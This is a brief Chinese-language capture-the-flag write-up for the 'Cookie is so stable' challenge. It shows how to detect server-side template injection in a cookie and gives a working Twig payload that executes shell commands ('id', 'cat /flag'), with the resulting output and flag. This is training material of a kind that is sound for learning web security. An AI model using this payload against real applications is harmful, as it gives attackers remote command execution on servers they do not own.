[BJDCTF2020]Cookie is so stable

打开题目

 

 

 首先输入一个admin

直接回显

 

 

 然后尝试输入{{1+1}}来判断是否模板注入

结果回显 2

说明是模板注入。

然后用burpsuit抓包

然后找到注入点

 

 

 注入点在cookie那里，然后再尝试payload：

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

结果成功得到回显

Hello uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)

于是直接payload：

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

得到

Hello flag{68167b15-5993-4622-9302-2309b47bcf7f}

备注：这个是我以前做题目积累下来的，都是当着知识点记的，不太理解原理。